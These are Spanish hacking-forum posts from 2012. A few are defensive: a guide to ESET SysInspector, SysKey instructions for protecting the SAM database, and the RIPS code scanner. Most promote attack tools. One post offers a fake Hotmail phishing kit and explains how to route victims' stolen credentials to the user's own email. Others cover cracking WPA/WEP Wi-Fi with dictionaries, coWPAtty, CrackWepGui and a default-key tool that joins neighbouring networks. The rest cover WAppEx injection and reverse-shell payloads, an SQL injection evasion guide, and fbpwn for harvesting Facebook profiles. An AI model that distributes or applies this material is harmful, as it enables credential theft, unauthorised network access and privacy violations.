ESET SysInspector 64-bit:    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



ESET SysInspector es un software gratuito desarrollado por ESET que permite recolectar información crítica relacionada a determinadas
actividades que se realizan en un sistema operativo. Extrae todos los datos posibles, para poder tener un mayor control de que aplicaciones
están ejecutándose, el uso de librerías, quien las utiliza, conexiones de red y alguna cosilla más que iremos viendo sobre la marcha.

"ESET SysInspector está concebido como herramienta de análisis y no como herramienta
de desinfección o reparación de los daños ocasionados por códigos maliciosos u otras aplicaciones"

No necesita privilegios de Administrador para ser ejecutado, pero la cantidad y
detallle de información que suministre dependerá de los permisos que posea el usuario que lo ejecute.

Ejecutando ESET SysInspector : hay que aceptar el acuerdo de licencia.


Interfaz principal:


El metodo de filtrado utilizado consiste en mostrar los procesos/datos asignando un color según su peligrosidad:

Verde: Aplicación conocida (fiable)
Naranja: Aplicación dudosa o con modificaciones en el archivo original (no por ello un virus)
Rojo: Vendría a ser un proceso no reconocido o peligroso (no por ello un virus).

En la ventana de la izquierda nos mostrará toda la información obtenida del sistema. Haremos un click sobre la descripción que queramos visualizar y en la ventana de la derecha podrás ver todo lo relacionado a ese proceso/archivo. Arriba a la derecha tenemos un menú para administrar los log´s, filtrado por elementos, comparativa.


Para cualquier duda puedes consultar el archivo de "ayuda" incluido, accediendo al Menu/Ayuda (superior/derecha) o pulsando F1.

Procesos en ejecución :


Todos los procesos que actualmente se ejecutan en tu Pc estarán aquí (algunos Rootkit pueden no aparecer...). Haremos un click sobre un proceso aleatorio o sospechoso y en la ventana de la derecha, abajo nos mostrará información sobre quien utiliza la aplicación, su PID (identificador de proceso), modo de ejecución (administrador, usuario...).
Haciendo doble click sobre el proceso, nos mostrará las dependencias del archivo (archivos de librerías utilizados y otros relacionados con él). Es "muy importante" fijarse en los archivos que crean conexiones externas, como son: svchost.exe, lsaas.exe, al clickar sobre ellos, en la ventana de información nos mostrará las IP´s que utiliza en las conexiones y el estado (listen, established, etc). Estas IP´s tendrán que ser las normales de tu red (ejemplo: 127.0.01; 0.0.0.0). Si utilizas maquinas virtuales se asignara una diferente (ejemplo: 10.02.0.14) Sobre svchost.exe, hay que mencionar que puedes tener múltiples instancias en ejecución, pues cada uno sirve para una tarea diferente (actualizaciones, red...), pero nunca con diferente nombre, es decir "svcchost.exe", "svhost.exe" pues esto te indicaría la presencia de un "troyano" o similar.

Conexiones de red :


En éste apartado podremos observar que programas crean una conexión, divididas por el protocolo utilizado (TCP/UDP). Dependiendo de los programas utilizados mostrará más o menos conexiones, pero para una pc normal de casa, sólo tendrían que haber las conexiones utilizadas por el sistema operativo ( System, lsaas.exe, svchost.exe y alg.exe), suponiendo que el navegador y todo programa que se conecte a internet estén cerrados. Las IP´s contenidas en ésta categoría tendrían que ser las normales utilizadas en tu red, ( 0.0.0.0 , 127.0.0.1 ,192.168.x.x), ésta última puede variar en función de tu proveedor de internet (ISP).
Un dato importante sería el asociar cualquier proceso que corre en la máquina con su identificador (PID).
Para entenderlo mejor haremos lo siguiente : ve a <Inicio> y clicka en <Ejecutar>, en ésa ventana escribe cmd y pulsamos <Intro> para acceder a la consola de comandos. Usaremos el comando netstat. Para dudas escribir "netstat ?". Escribiremos "netstat –aon" (un espacio entre netstat y -aon) y pulsamos <Intro> para poder ver las conexiones activas. Nos encontramos ante cinco descripciones donde se nos muestra el protocolo que utiliza en la conexión, direcciones IP remota y local, el estado y el PID. Si tienes algún P2P conectado, mejor ciérralo pues te vas a volver loco con tanta conexión. Siempre tendrás alguna conexión en estado "Listening" (Escuchando), que son normalmente <svchost> y <lsaas> en los diferentes puertos utilizados (135; 443; 139;1025) . También mostrará las conexiones establecidas (Established) que son las que nos interesan, como son el navegador, el ftp y todo lo que se conecte a Internet:


Si algún proceso mostrado en Eset-SysInspector te resulta sospechoso, no tienes más que poner el nombre del proceso en "Google" (ejemplo: svchost.exe) y buscar información sobre el proceso. Hay páginas Web dedicadas a esto. Cuando Google te muestre los links referentes al proceso, busca que pertenezcan a los siguientes enlaces pues son bastante fiables:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Entradas de registro importantes:


En este apartado se extraen algunas entradas del registro, sobre todo las relacionadas con:

- Programas de arranque junto al S.O
- Configuraciones del navegador
- Listado de drivers con asociación de archivo
- Algunas configuraciones del antivirus instalado
- Configuraciones de la red.

Servicios:


Conexiones con dispositivos, instancias internas del S.O, etc.
Muestra la descripción del proceso, ruta en disco, modo de inicio, estado del dispositivo, descripción del servicio y nombre de la compañía/empresa. Los servicios normales utilizados por el S.O y aquellas aplicaciones conocidas estarán marcadas en verde. Hay que tener en cuenta que ciertos drivers/servicios pueden aparecer de color naranja o incluso rojo y no por ello quiere decir que el sistema esté infectado. En estos casos nos veremos obligados a buscar en google información sobre el nombre del proceso, carpeta de instalación y sobre todo si se trata de un servicio esencial del S.O, en este caso no se debería desactivar. Para gestionar los servicios en Windows, haremos uso del comando "services.msc" en Inicio --> Ejecutar


Para desactivar algún servicio haremos click sobre el proceso y si da la opción desde el menú contextual, procederemos a "desactivar" el servicio. Se puede dar el caso de que no muestre la opción, entonces clickamos sobre "Propiedades" en ese mismo menú contextual, y ahora podremos elegir la opción de detener o incluso eliminarlo. Es muy importante que verifiques que el servicio no lo ejecute ninguna aplicación de Windows o otros programas, es preferible informarse bien y luego realizar la acción.

Controladores:


Aquí podremos ver todos los drivers/controladores de los dispositivos, ya estén en "ejecución" o "detenidos".

Archivos críticos:


En esta sección podremos ver tres apartados: <win.ini>, <system.ini> y el archivo de <hosts>. Los analizaremos por separado pues éstos son muy importantes para el buen funcionamiento del sistema. La carga de controladores, etc, que hacen los archivos <win.ini> y <System.ini> los podremos ver en la "Utilidad de configuración del sistema". Para esto haremos click en "Inicio", clickamos en "Ejecutar", en la ventana nueva escribiremos msconfig y aceptamos. Ahora veremos una ventana como ésta :


<win.ini> : Este archivo es leído por Windows al iniciar el sistema. Contiene datos acerca del hardware instalado y el entorno actual utilizado (escritorio, etc). En el log de SysInspector tendrían que estar todas las entradas marcadas en verde, pues Eset las reconoce como verdaderas. Cualquier entrada en color rojo tendría que ser revisada y/o corregida.
<system.ini> : Este archivo también se carga al iniciar Windows y está directamente relacionado con <msconfig>. La tarea principal es la de mostrarle a Windows los archivos de los controladores instalados (drivers). En el log de Eset también tendrían que estar en verde todas las entradas.
<hosts> : Dependiendo del tipo de infección (en caso hipotético) este archivo será modificado para redireccionar y/o modificar todas las peticiones de tu navegador. En el log de Eset solo tendría que aparecer una línea con la dirección de tu red (normalmente 127.0.0.1) y marcada en verde. (dependerá también del tipo de red o redes configuradas, esto como administrador tendrás que averiguarlo por tu cuenta).


Dejo un ejemplo de un análisis en la computadora infectada de un amigo:


Esta es de una infección posterior:


Como podemos ver, aparte de la línea marcada en verde "127.0.0.1 localhost", hay otras entradas que no son validas que son las marcadas en rojo. Ahora para comprobarlo manualmente abriremos el archivo de hosts en la siguiente ubicación: C:\WINDOWS\System32\drivers\etc, para abrirlo haz doble click y elige abrir con el bloc de notas. Veras un archivo de texto como éste:



System Scheduler Tasks:


En esta sección se enumerarían las tareas programadas en el S.O. Si no tienes ninguna tarea cotidiana, aparecerá en blanco.

Información del sistema:


Detalles del archivo:


Ejemplos:

Esto es un ejemplo de un análisis con entradas marcadas en color rojo (supuestamente sospechosas), pero no es por ninguna infección, al no estar reconocido en las bases de datos de Eset este es un servicio de dudosa procedencia y de ahí que lo filtre como peligroso. En esta captura podemos observar varios procesos en ejecucuión que SysInspector toma como sospechosos. Ahora tocaría buscar info sobre esos procesos para ver que aplicación se encarga de ejecutarlas. Estos procesos son de un SAI (Sistema de Alimentación Ininterrumpida). En el casillero de abajo/derecha podrás ver cierta información interesante sobre cada proceso, dependencias.



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#53

La base de datos de administración de cuentas de seguridad (SAM) de Microsoft Windows 2000, Microsoft Windows XP, 7 y Microsoft Windows 2003 almacena copias con algoritmo hash de las contraseñas de usuario. Esta base de datos se cifra con una clave de sistema almacenada localmente. Para mantener la base de datos SAM segura, Windows requiere que se cifran los hash de contraseña. Windows impide el uso de hash de contraseña no cifrados almacenados.

Puede emplear la utilidad SysKey para proteger aún más la base de datos SAM si mueve la clave de cifrado de la base de datos SAM fuera del equipo basado en Windows. La utilidad SysKey también puede emplearse para configurar una contraseña de inicio que se debe escribir para descifrar la clave del sistema de manera que Windows pueda tener acceso a la base de datos SAM. En este artículo se describe cómo emplear la utilidad SysKey para proteger la base de datos SAM de Windows.

Configurar la protección de la clave del sistema de Windows

Para configurar la protección de la clave del sistema de Windows, siga estos pasos:
En un símbolo del sistema, escriba syskey y presione ENTRAR.
En el cuadro de diálogo Asegurar base de datos de cuentas de Windows, observe que la opción Cifrado habilitado está seleccionada y es la única opción disponible. Cuando se selecciona esta opción, Windows siempre cifrará la base de datos SAM.
Haga clic en Actualizar.
Haga clic en Inicio con contraseña si desea exigir una contraseña para iniciar Windows. Utilice una contraseña compleja que contenga una combinación de letras mayúsculas y minúsculas, números y símbolos. La contraseña de inicio debe tener al menos 12 caracteres de longitud y puede tener hasta 128 caracteres.

Nota: si debe reiniciar de forma remota un equipo que requiere una contraseña (si utiliza la opción Inicio con contraseña), debe haber una persona en la consola local durante el reinicio. Utilice esta opción sólo si va a haber disponible un administrador de seguridad de confianza para escribir la contraseña de inicio.
Haga clic en Contraseña generada por el sistema si no desea solicitar una contraseña de inicio.

Seleccione cualquiera de las opciones siguientes:
Haga clic en Almacenar la clave de inicio en un disco para almacenar la contraseña de inicio del sistema en un disquete. Esto requiere que alguien inserte el disco para iniciar el sistema operativo.
Haga clic en Almacenar la clave de inicio localmente para almacenar la clave de cifrado en el disco duro del equipo local. Ésta es la opción predeterminada.
Haga clic en Aceptar dos veces para completar el procedimiento.

Quite la clave de cifrado de SAM del disco duro local utilizando la opción Almacenar la clave de inicio en un disco para lograr una seguridad óptima. Esto proporciona el mayor nivel de protección para la base de datos SAM.

Cree siempre un disquete de copia de seguridad si utiliza la opción Almacenar la clave de inicio en un disco. Puede reiniciar el sistema de forma remota si hay alguien disponible para insertar el disco en el equipo cuando éste se reinicia.
Nota: la base de datos SAM de Microsoft Windows NT 4.0 no se cifraba de forma predeterminada. Puede cifrar la base de datos SAM de Windows NT 4.0 mediante la utilidad SysKey.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#54
Hacking / Fake hotmail (By Aryenal)
Agosto 12, 2012, 11:21:20 PM

hola Underc0de aquí les dejo a su dispocision un Fake de hotmail.

Descripción: este fake como todos lo que hace es imitar una pagina de inicio de hotmail, con la intención de que una persona ingenua o que desconoce el termino de phishing caiga en ella, una ves que la victima haiga puesto sus datos ("usuario y contraseña") el fake lo llevara a la pagina verdadera de hotmail, paralelamente los datos puestos por la victima habrán sido enviados a una cuenta de correo especificada. la cual te hablo en el siguiente parrafo.


Nota: modifiquen las lineas del archivo "proceso.php" siguientes por la dirección de correo electrónico a donde quieren que lleguen los datos:

$from="[email protected]";
$to="[email protected]";

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pass: Aryenal
Saludos, cualquier cosa estaré atendiendo sus ¿?

PD: No me hago responsable por el uso que le den.
#55
C# - VB.NET / Video2Brain: Visual Basic .NET (2012)
Agosto 10, 2012, 11:30:39 PM

Descripción:

Creación de aplicaciones de escritorio para Windows

Crea tus propios programas para Windows con Visual Basic .NET. En este curso video2brain te enseñamos los componentes de este lenguaje de programación y cómo crear programas en ventanas, y todo ello de una manera visual y práctica.
José Vicente Carratalá te presenta su curso Visual Basic .NET. Creación de aplicaciones de escritorio para Windows.
En este curso video2brain aprenderás a crear tus propias aplicaciones ejecutables de escritorio para el sistema operativo Microsoft Windows

Comenzaremos preparando un entorno visual de trabajo, conocido como IDE, que nos proporcionará un entorno práctico y accesible sobre el cual desarrollar nuestros programas. A continuación, te enseñaremos paso a paso cada uno de los componentes del lenguaje, que necesitarás para combinarlos y crear programas con ellos.

Además, te enseñaremos a usar Windows Forms. Con Windows Forms podrás crear interfaces de usuario para programas en Visual Basic, de manera que tus creaciones se presentarán en las familiares ventanas de Windows, que harán que tus programas sean más fáciles de desarrollar para ti, y más fáciles de usar para tus usuarios.


Se facilitarán todos los archivos necesarios para el desarrollo del proyecto para que puedas practicar a tu gusto repitiendo los ejercicios que se llevan a cabo a lo largo de este curso video2brain.

Requisitos del sistema

Conexión a banda ancha a internet
Navegador actualizado, con plugin de Flash
Resolución mínima de pantalla de 1.024 x 768
Tarjeta de sonido, altavoces o auriculares
Pentium 4 a 2,6 GHz o G4 a 1 GHz
512 MB de RAM


Link de Descarga:



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargarnsn
#56

Es algo imprecindible tener un buen diccionario dotado de infinidad de palabras, por lo que es algo fundamental que en esta Zona Wireless, se postee algunos, para ayudas de crackeo a un archivo .pcap con seguridad WPA O WPA2-PSK.

Diccionarios:

1.- Palabras Tecnicas: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3.- Palabras en Español:
- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

4.- Facebook (Nombres de Usuarios): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
5.- Fechas: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
8.- Numeros: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
9.- Wikipedia (español): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Aplicaciones para generar Diccionarios Personalizados:

1.- CeWL: es una herramienta escrita en ruby por Robin Wood, de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, que permite generar diccionarios con palabras claves, que pueden ser utilizadas por programas como Cain & Abel, Bruter o John the Ripper, para realizar ataques de fuerza bruta .

Lo que diferencia CeWL de cualquier otra herramienta para generar listas de passwords, es que extrae las palabras claves desde una url, por lo que la lista generada es mas especifica y puede incluir palabras que no se encuentran en las tipicas listas de password, pero que posiblemente este siendo usada como clave por algun usuario del sistema.

Modo de Uso: El modo de uso de CeWL es el siguiente: cewl [opcion u opciones] URL, teniendo como opciones los siguientes parametros:

–help, -h
Muestra ayuda
–depth x, -d x
Nivel de profundida del escaneo
–min_word_length, -m
Tamaño minimo de cada palabra, util si no deseamos llenar la lista con palabras como "de", "la", "por",etc..
–offsite, -o
Por defecto CeWL solo revisa una url especifica, con esta opcion escaneara tambien enlaces externos.
–write, -w file
Escribe la salida del CeWL en un archivo
–ua, -u user-agent
Cambia el user-agent
-v
Utiliza el modo Verbose,  mostrando mas informacion de salida
–no-words, -n
No muestra la lista
–meta, -a
Incluye meta datos
–email, -e
Incluye correos encontrados
–meta-temp-dir directory
Especifica el directorio utilizado por exiftool para convertir los archivos, por defecto es /tmp
URL
La url a escanear

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

2.- Swifi Keygen:

Es una herramienta orientada a la auditoria de redes inalambricas. Genera diccionarios para poder auditar las redes con patrones conocidos.


Descargar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

PD: este post seguira actualizandose constantemente, por otra parte aconsejo de que no pierdan su tiempo utilizando diccionarios que estan basados  palabras de idioma en Ingles para crakear una password en español.

Bibliografia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#57
Una consulta ¿? alguien conoce alguna aplicacion o algun codigo en php, para poder realizar un ataque de Crackeo (se podría decir) al azar, algo asi parecido a esta herramienta: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
#58
Seguridad Wireless / coWPAATTY (Crackear WPA-PSK)
Julio 30, 2012, 07:08:47 PM

coWPAATTY es una herramienta para crackear WPA-PSK, creado por Joshua Wright No tienes permitido ver los links. Registrarse o Entrar a mi cuenta posee todas las cualidades que se podria pedir, requiere como minimo, una o dos tramas, o dos y tres de las tramas del acuerdo de cuatro vias para comenzar a crackear.


Lanzar un ataque de diccionario con e es muy facil:


especificamos nuestro diccionario con (-f) el SSID de la Red (-s) y el archivo de captura con (-r) y por ultimo (-2) lo que habilita el modo no estricto, algo que es requerido cuando proporcionamos una captura que contiene menos de las cuatro vias.

* Una interesante caracterisitca de coWPAATTY es que recoge la lista de frases de paso desde la entrada estandar (stdin) esta funcion es muy eficaz ya que podemos combinarla con herramientas que van a realizar las permutaciones de palabras, como John the Ripper, que lo pueden encontrar en: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Instalacion:

1.- Descargar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2.- descomprimir: tar zxf (nombre del archivo)
3.- Instalamos dependencias:
                                         apt-get install libssl-dev

                                         apt-get install libpcap0.8-dev

                                         apt-get install libdigest-hmac-perl

4.- instalamos: nos ubicamos en el directorio en el que se encuentra coWPAATTY y tecleamos:  make; luego -> aptitude install build-essential -> sudo cp cowpatty /usr/bin

Mas Informacion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: Libro: "Hacking Exposed - Wireless"


Saludos  8)
#59
WAppEx es una suite para realizar pentesting de aplicaciones web automatizadas que corre en entornos Microsoft Windows, Mac OS X y GNU Linux (con WINE o WinOnX), fue desarrollado por itsecteam, la misma empresa que sacó al mercado Havij, catalogado por muchos como la herramienta automática mas simple y efectiva para realizar ataques de SQL Injection.


Pero WAppEx no se queda solo en las inyecciones SQL, sino que explota diferentes fallos de seguridad que encontramos comúnmente en las aplicaciones web, tiene una gran base de datos con diferentes payloads para los múltiples ataques que soporta, podemos explotar los siguientes fallos de seguridad, con la facilidad de uso y efectividad a la que estamos acostumbrados en Havij.


SQL Injection: Utilizando Havij dentro de su suite, podemos explotar fácilmente fallos de SQL Injection, una de las vulnerabilidades mas delicadas cuando hablamos de aplicaciones web.

Remote File Inclusión: WAppEx incluye una herramienta para verificar si un sitio es vulnerable a RFI y trae consigo diferentes payloads para poder incluir archivos y ejecutar comandos en el servidor web.

Local File Inclusión: Similar al Remote File Inclusión, solo que permite incluir archivos locales en el servidor web.

OS Commanding: WAppEx incluye un modulo para testear la aplicación web y explorar la posibilidad de ejecutar comandos del sistema operativo en ella, incluye un buen listado de comandos que nos pueden arrojar una shell reversa del servidor web a nuestro equipo.

Script injection: WAppEx testea automáticamente si a la aplicación web se le puede inyectar o ejecutar scripts y nos ayuda a escalar privilegios hasta conseguir una shell reversa.

Local File Disclosure: Modulo que permite descubrir el contenido de archivos locales en servidores web mal configurados o desprotegidos.

Auto Detect: Buscara automáticamente si la url que le pasaste tiene alguno de los fallos de seguridad antes mencionados.

Además de los módulos antes comentados, WAppEx también incluye:


Crackeador de hash online: Una herramienta que nos facilita la tarea de buscar en diferentes bases de datos gratuitas en busca del texto que corresponda al hash que le pasemos

Encoder/Decoder: Un codificador / decodificador con diferentes algoritmos de cifrado.

Find Login Page: Una herramienta que nos ayuda a buscar el panel de administración o pagina de login de la aplicación web.

Browser: Un pequeño navegador para revisar los resultados.

WAppEx script engine: Cuenta con un motor de scripting que nos permite escribir nuestros propios payloads o scripts para explotar vulnerabilidades en aplicaciones web.

WAppEx es una nueva herramienta a tener en cuenta para nuestros test de penetración en aplicaciones web, esta bastante completa, además incluye cientos de exploits y payloads que nos facilitaran mucho el trabajo; Los creadores afirman que esta base de datos se estará actualizando constantemente y pretenden incluir vulnerabilidades zero day en ella a futuro.

Todavía no se sabe el precio de venta de WAppEx, pero podemos disfrutarla un tiempo gracias a que en esta primera versión publica, los desarrolladores han publicado una licencia de pruebas validad hasta noviembre (aunque siempre encontraremos formas de extenderla...) para que probemos la herramienta.

Para activar la licencia solo debes descarga WAppEx 1.0 y el archivo de licenciamiento (click derecho guardar como...) y cuando la aplicación lo solicite, le ingresamos como nombre ITSecTeam y el archivo .lic que descargamos.



WebSite: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Descargar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Archivo de licencia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: Dragonjar
#60

Les dejo una guía en Ingles muy completa para inyecciones SQL que cubre MySQL, MSSQL y ORACLE, desde la detección de inyecciones SQL hasta explotación avanzada evadiendo WAF/IDS.

El autor Roberto Salgado (@LightOS) agrega nuevos ataques y métodos de evasión diariamente.

Es una guía muy extensa, clara y está organizada muy ordenadamente por temas:

MySQL:
Default Databases
Testing Injection
Comment Out Query
Testing Version
Database Credentials
Database Names
Server Hostname
Tables and Columns
Avoiding quotations
String concatenation
Conditional Statements
Timing
Privileges
Reading Files
Writing Files
Out of band channeling
Stacked Queries with PDO
MySQL-specific code
Fuzzing and Obfuscation
Operators
Constants
Password Hashing
Password Cracker

MSSQL:
Default Databases
Comment Out Query
Testing Version
Database Credentials
Database Names
Server Hostname
Tables and Columns
Avoiding quotations
String concatenation
Conditional Statements
Timing
OPENROWSET Attacks
System Command Execution
SP_PASSWORD (Hiding Query)
Stacked Queries
Fuzzing and Obfuscation
Password Hashing
Password Cracker

ORACLE:
Default Databases
Comment Out Query
Testing Version
Database Credentials
Database Names
Server Hostname
Tables and Columns
Avoiding Quotations
String concatenation
Conditional Statements
Timing
Privileges
Out Of Band Channeling

Extras:
About
Contact
Special Thanks
Google Docs Version
SQLi Challenges
SQL Fiddle
Pentestmonkey Cheatsheet
Ferruh Mavituna Cheatsheet
MS Access Cheatsheet
SQLite3 Cheatsheet
Reiners Filter Evasion Cheatsheet
OWASP Prevention Cheatsheet
HTML5 Security Cheatsheet

Visto en: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Ingresar al Manual: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#61

Hola que tal, aquí les dejo un video tutorial, hecho por este humilde servidor.

Descripción: en este videotutorial se detalla un ataque una señal Wireless protegida por WPA-PSK, la misma que contiene su SSID Oculto.

Enlace del Video: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#62
Seguridad Wireless / Crack Wep GUI
Julio 23, 2012, 06:26:32 PM
Crack Wep Gui

Descripción:

CrackWepGui es una Interfaz Grafica de Usuario de la herramienta aircrack-ng que puede romper el protocolo WEP y WPA de redes, busca automáticamente las redes disponibles, proporciona una falsa autenticación y el apoyo de la inyección.


Características:

- Romper el protocolo WEP redes encriptadas.
- Romper las redes cifradas WPA.
- Soporte para múltiples interfaces.
- Red de exploración.
- Paquete de inyección.
- Falsa autenticación. (Clave abierta y compartida)
- Mac cambiador de dirección.
- El descubrimiento de los SSID ocultos
- WEP Diccionario ataque
- Generador de contraseñas para las redes WPA
- Frontend para Qt y Gtk

Web Site: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

PD: Es una muy buena herramienta. me atrevo a recomendarla.
#63

¿Qué es WPSFp?
Pequeña herramienta para encontrar plug-ins instalados y vulnerables. También encuentra vulnerabilidades a la respectiva versión de WordPress que se analiza. Útil para pruebas de penetración y / o para la diversión y el beneficio. La versión actual cuenta con 240 pruebas de seguridad.

Descargar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para seguir esta entrada recomiendo usar Backtrack.

Una vez descargada y descomprimida la carpeta proseguimos con la ejecución de la siguiente forma.
seguridaddelmal@bt:~$ ls
FS-WPSFp_v1.0_240  FS-WPSFp_v1.0_240.tar.gz
seguridaddelmal@bt:~$ cd FS-WPSFp_v1.0_240
seguridaddelmal@bt:~/FS-WPSFp_v1.0_240$ ./FS-WPSFp_v1.0_240 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Pulsamos Intro y comenzará el análisis de la web.


Si se fijan en la captura la primera vulnerabilidad que encontró fue en la versión de WordPress (3.3.1). Esperamos que finalice el análisis para comprobar el "Summary".


De los 240 plug-ins que analizó no encontró ninguno vulnerable. Parece segura esa web jajaja...
Como pueden comprobar WPSFp es una herramienta muy útil para buscar vulnerabilidades y mantener nuestros sitios web´s seguros. Ideal herramienta para practicar en nuestro localhost....

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#64
Seguridad Wireless / Wifi Auditor
Julio 11, 2012, 12:04:21 AM

Un breve resumen para poner en antecedentes: Hace relativamente poco tiempo el portal de seguridad SeguridadWireless publicó que habían conseguido descubrir el algoritmo por el cual se generaban las claves por defecto de los routers Comtrend (concretamente el modelo CT-5365) que distribuyen masivamente a sus clientes Telefónica y Jazztel.

La publicación se hizo de una forma un tanto oscura, mediante una web que permitía averiguar la clave de la red Wifi introduciendo los datos de cualquiera de los routers mencionados anteriormente, (identificados por WLAN_XXXX en el caso de Telefónica y JAZZTEL_XXXX en el caso de Jazztel). Sin estar aun demasiado claros los motivos, a las pocas horas de la presentación, la web fue cerrada aduciendo motivos de 'fuerza mayor'.

El problema es que, una vez que prendes según que mechas, luego es difícil ponerles freno y evitar que exploten. Un usuario presumiblemente de lampiweb destapó la caja de pandora publicando otra web con la misma funcionalidad que el anterior, pero con una salvedad: publicó el algoritmo y varias pruebas de concepto en diferentes lenguajes de programación.

Personalmente creo que revelar al mundo que existe una vulnerabilidad lo suficientemente grave como para poder comprometer su privacidad o integridad y tratar de hacerlo 'de tapadillo', no es el camino correcto.

Tenemos un ejemplo bastante reciente: Firesheep, todos sabíamos que un buen número de paginas web, por comodidad, ahorro de costes o dejadez, dejaban en una situación muy precaria la seguridad de sus usuarios, pero hizo falta la aparición de Firesheep para que la situación diese un giro. Muchos sitios se hicieron eco y a raíz de ello, Hotmail y posteriormente Facebook, dieron el paso correcto de añadir SSL a sus comunicaciones.

En esta línea Luis Delgado (colaborador habitual de este blog) ha programado WIFI Auditor, herramienta para Windows que simplifica el proceso de explotación de la vulnerabilidad y ejemplifica bastante bien el problema.

El funcionamiento de la herramienta es extremadamente sencillo:

Cuando abres la aplicación te muestra las redes disponibles. Al hacer click sobre el botón, 'Auditar' la aplicación comprueba qué redes son vulnerables y te las muestra junto con su clave por defecto. Finalmente, basta con seleccionar una y hacer clic en el botón 'conectar' para que automáticamente Windows se conecte a la red, sin necesidad de que el usuario haga nada.

La aplicación utiliza netsh para todo el proceso. Cuando el usuario selecciona una red y se conecta, la aplicación genera un perfil con todos los datos de la red y lo importa bajo el nombre 'WIFI Auditor' y posteriormente se conecta con él.

Actualmente la aplicación se encuentra en su versión 0.1c., por lo que cualquier problema/sugerencia sería bueno que la comentaseis. Para futuras versiones, la idea sería añadirle nuevos algoritmos de redes vulnerables con los que la clave se obtenga de forma "inmediata".

La aplicación la podéis encontrar aquí: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Para ejecutarla necesitáis tener instalado Java: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Además, por comodidad, se ha creado un instalador. Aun así, la aplicación es 'portable', por lo que basta con bajarse WIFIAuditor.jar y ejecutarlo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El código fuente de la aplicación lo podéis encontrar aquí: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Podéis ver una demo en el siguiente vídeo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#65
RIPS es un escaner de seguridad para encontrar vulnerabilidades en aplicaciones PHP a través del análisis estático de código. "Tokenizando" y analizando todos los archivos de código fuente, RIPS es capaz de transformar el código PHP origen en un modelo de programa y detectar los sinks sensibles (funciones potencialmente vulnerables) que pueden ser contaminadas por la entrada del usuario durante el flujo de la aplicación (influenciado por un usuario malicioso).


Además de la salida estructurada de las vulnerabilidades encontradas, RIPS también ofrece un marco de código de auditoría integrada para el análisis manual posterior.

Interfaz de auditoría de código:

- Escaneo de vulnerabilidades y estadísticas (XSS, SQLi, descubrimiento de ficheros, LFI/RFI, RCE y más)
- Agrupación de líneas de código vulnerables (de abajo a arriba o de arriba hacia abajo)
- Descripción de vulnerabilidades con ejemplos de código, PoC, creador de parches de exploits
- Lista de archivos y gráficos (conectados por includes)
- Lista de funciones y gráficos (conectados por calls)
- Lista de entradas de usuario (parámetros de la aplicación)
- Visor de código fuente con resaltado de sintaxis
- Saltos activos entre llamadas a funciones
- Búsqueda en el código mediante expresiones regulares
- 8 diseños de resaltado de sintaxis.

WebSite: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#66
fbpwn es una herramienta multi-plataforma echa en java que construye un framework de ingeniería social para Facebook (en adelante FB), capaz de enviar solicitudes de amistad a una lista de perfiles y esperar las notificaciones de respuesta. Una vez que la víctima acepta la invitación, vuelca toda su información, fotos y lista de amigos en una carpeta local.

Un escenario típico de hacking con esta herramienta comienza con la recopilación de información de un perfil de usuario de FB. Los plugins son sólo una serie de operaciones normales en FB, automatizados para aumentar la probabilidad de obtención de información.

